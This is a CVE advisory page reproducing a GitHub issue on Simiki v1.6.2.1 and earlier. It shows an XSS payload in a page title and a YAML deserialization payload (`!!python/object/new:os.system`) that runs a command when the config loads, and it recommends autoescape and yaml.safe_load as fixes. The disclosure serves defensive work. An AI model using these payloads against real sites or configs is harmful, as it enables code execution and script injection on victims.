Headline

CVE-2020-19001: SImiik <=v1.6.2.1 xss + rce · Issue #123 · tankywoo/simiki

Command Injection in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary system commands via line 64 of the component 'simiki/blob/master/simiki/config.py’.

3 years ago

CVE

Open in Source

#xss #vulnerability #mac #git #rce

1.XSS

Examples:

python3 -m simiki.cli new -t "Hello Simiki<svg/onload=alert(1)>" -c first-catetory

python3 -m simiki.cli g
python3 -m simiki.cli p

The affected file appears to be
https://github.com/tankywoo/simiki/blob/master/simiki/generators.py Line 54

By default, jinja2 sets autoescape to False. Consider using autoescape=True or use the select_autoescape function to mitigate XSS vulnerabilities.

2.RCE

https://github.com/tankywoo/simiki/blob/master/simiki/config.py line 64
Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

This can lead to remote code execution.

When simiki loads a malicious _config.xml file.

Payload：

!!python/object/new:os.system ["/Applications/Calculator.app/Contents/MacOS/Calculator"]

When using smiik again, smiik will load _config.yml and cause remote code execution

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago